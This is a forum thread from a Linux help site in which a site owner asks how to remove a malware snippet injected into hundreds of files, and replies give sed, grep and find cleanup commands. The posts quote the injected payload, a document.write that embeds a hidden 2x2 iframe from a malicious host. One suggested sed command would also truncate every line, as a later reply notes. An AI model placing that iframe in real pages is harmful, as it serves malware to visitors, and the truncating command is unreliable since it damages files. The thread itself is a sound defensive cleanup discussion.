LinuxQuestions.org
Latest LQ Deal: Linux Power User Bundle
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Newbie
User Name
Password
Linux - Newbie This Linux forum is for members that are new to Linux.
Just starting out and have a question? If it is not in the man pages or the how-to's this is the place!

Notices


Reply
  Search this Thread
Old 09-10-2012, 12:10 PM   #1
learning01
LQ Newbie
 
Registered: Jul 2012
Posts: 8

Rep: Reputation: Disabled
Question Substitute string in multiple files


Hello,

So - my site has malware that affects hundreds of files...that has the following snippet appended at the end of file on a newline and sometimes attached immediately after end of statement ;

I figured on how to list all the files that has a keyword by running:

Code:
 find . | xargs grep "adminsown" -sl > malware.txt
The snippet in question appended that i want to remove is:
Code:
document.write('<iframe src="http://adminsown.ru/VEREIN?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
But I cannot seem to have it working

leaving the malware link so that others may find this thread useful since it is a very popular malware being spread for few months that is changing patterns...

How - would I replace the malware snippet and keep the original string intact?

Thank you
 
Old 09-10-2012, 12:59 PM   #2
pixellany
LQ Veteran
 
Registered: Nov 2005
Location: Annapolis, MD
Distribution: Arch/XFCE
Posts: 17,802

Rep: Reputation: 738Reputation: 738Reputation: 738Reputation: 738Reputation: 738Reputation: 738Reputation: 738
To remove just that snippet, you need to be sure it is defined correctly. In your discussion, you say you searched on "adminsown". That certainly seems unique, but the question is how to define what else is to be removed---for example:
1. Remove all lines containing "adminsown".
2. Remove all phrases starting with "document", including "adminsown", and ending with "iframe>);"


If the definition is #1, then here is an easy solution:
Code:
sed 's/^.*adminsown.*$//' filename > newfilename
This can be put in a loop that reads the filenames from another file.

To modify the files "in place", use sed -i.
 
1 members found this post helpful.
Old 09-10-2012, 01:31 PM   #3
learning01
LQ Newbie
 
Registered: Jul 2012
Posts: 8

Original Poster
Rep: Reputation: Disabled
Hello Pixellany,

Yes - this is certainly helpful and thank you. However there is one little problem - this works as long as the snippet is on a newline and not attached. Some of the javascript files contain connected statements example:

Code:
var tinyMCEImageList = new Array(["Logo 1", "logo.jpg"],["Logo 2 Over", "logo_over.jpg"]);document.write('<iframe src="http://adminsown.ru/VEREIN?8" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
This will end up removing more than what is needed; I think what we may need to do is find the substr and replace it only instead of the whole string. The replacement substr could be empty space " " or Newline.
 
Old 09-10-2012, 01:43 PM   #4
pixellany
LQ Veteran
 
Registered: Nov 2005
Location: Annapolis, MD
Distribution: Arch/XFCE
Posts: 17,802

Rep: Reputation: 738Reputation: 738Reputation: 738Reputation: 738Reputation: 738Reputation: 738Reputation: 738
In that example, the sed replacement statement could be:
Code:
sed 's/document.*adminsown.*iframe');//'
Note that the single quote after iframe will need something to keep it from actin as a quote....I don't know that detail off the top of my head.

You can also do:
Code:
sed 's/document.*adminsown.*$//'
This simply goes to the end of the line.
 
1 members found this post helpful.
Old 09-10-2012, 09:04 PM   #5
learning01
LQ Newbie
 
Registered: Jul 2012
Posts: 8

Original Poster
Rep: Reputation: Disabled
Thumbs up

I figured this would be easier - since the string is always at the end of file and is 141 characters:
Code:
find . | xargs grep 'adminsown' -sl | xargs sed -i 's/.\{141\}$//'
Thanks for your help - I guess I should learn more on SED - very handy!

TAGS:
site infected with malware google browser error warning
Warning: Something's Not Right Here!
 
Old 09-11-2012, 02:31 AM   #6
David the H.
Bash Guru
 
Registered: Jun 2004
Location: Osaka, Japan
Distribution: Debian sid + kde 3.5 & 4.4
Posts: 6,823

Rep: Reputation: 1958Reputation: 1958Reputation: 1958Reputation: 1958Reputation: 1958Reputation: 1958Reputation: 1958Reputation: 1958Reputation: 1958Reputation: 1958Reputation: 1958
Code:
sed 's/document.*adminsown.*$//'
This seems a bit risky to me, as it relies on a few keywords plus greedy globbing patterns. There is a non-zero risk of hitting false positives. In particular, the the common word "document" could appear more than once in the line.

Code:
sed -i 's/.\{141\}$//'
Uh-oh. This will remove the last 141 characters from every line of every file fed to it! At the very least we need to give it a target address of only the last line of the file. Even better would be to put at least a few of the actual string characters in it.

Also, use the -r option to avoid having to backslash the brackets. Set the -i option so that it creates backup files too. You can always run a quick find command to remove them later when you're sure everything went as planned.

Code:
sed -i.temp.backup -r '$ s/document\.write.{117}iframe>');$//'

Finally, be aware that the above use of xargs will fail on filenames that contain whitespace. See here for how to handle them safely:

How can I find and deal with file names containing newlines, spaces or both?
http://mywiki.wooledge.org/BashFAQ/020


Edit: I'd personally go with a while+read loop instead:

Code:
while IFS='' read -r -d '' fname; do

	if grep -q "adminsown" "$fname"; then

		sed -i.temp.backup -r '$ s/document\.write.{117}iframe>');$//' "$fname"

	fi

done < <( find . -type f -print0 )
Maybe a bit slower, but probably safer and easier to manage.

Edit2:

Thinking a bit more, you should be able to replace the find command with a simple recursive grep, a simplify the loop:

Code:
while IFS='' read -r -d '' fname; do

	sed -i.temp.backup -r '$ s/document\.write.{117}iframe>');$//' "$fname"
	echo "$fname" >> logfile

done < <( grep -R -D skip -I -s -l -Z "adminsown" / )
I also added a line that prints the filenames to a logfile, for later tracking.

Last edited by David the H.; 09-11-2012 at 11:41 AM. Reason: Added last part
 
2 members found this post helpful.
Old 09-11-2012, 08:05 AM   #7
learning01
LQ Newbie
 
Registered: Jul 2012
Posts: 8

Original Poster
Rep: Reputation: Disabled
Excellent David. Much appreciated.
 
Old 09-11-2012, 11:43 AM   #8
David the H.
Bash Guru
 
Registered: Jun 2004
Location: Osaka, Japan
Distribution: Debian sid + kde 3.5 & 4.4
Posts: 6,823

Rep: Reputation: 1958Reputation: 1958Reputation: 1958Reputation: 1958Reputation: 1958Reputation: 1958Reputation: 1958Reputation: 1958Reputation: 1958Reputation: 1958Reputation: 1958
Whoops! Just noticed and fixed an error in the option order in my final grep command.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Find a String in Multiple Files raihan26 Linux - Newbie 3 07-28-2012 04:04 AM
[SOLVED] Need to remove dynamic string across multiple lines and files. vandigroup Linux - Server 2 05-15-2011 12:50 AM
Find & Replace string in multiple files Rudy Linux - General 14 04-15-2010 09:10 AM
Substitute String or line in a file dimsh Linux - Newbie 4 09-21-2005 04:26 AM
Substitute a string :) alaios Linux - General 3 06-12-2005 05:55 AM


All times are GMT -5. The time now is 10:56 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration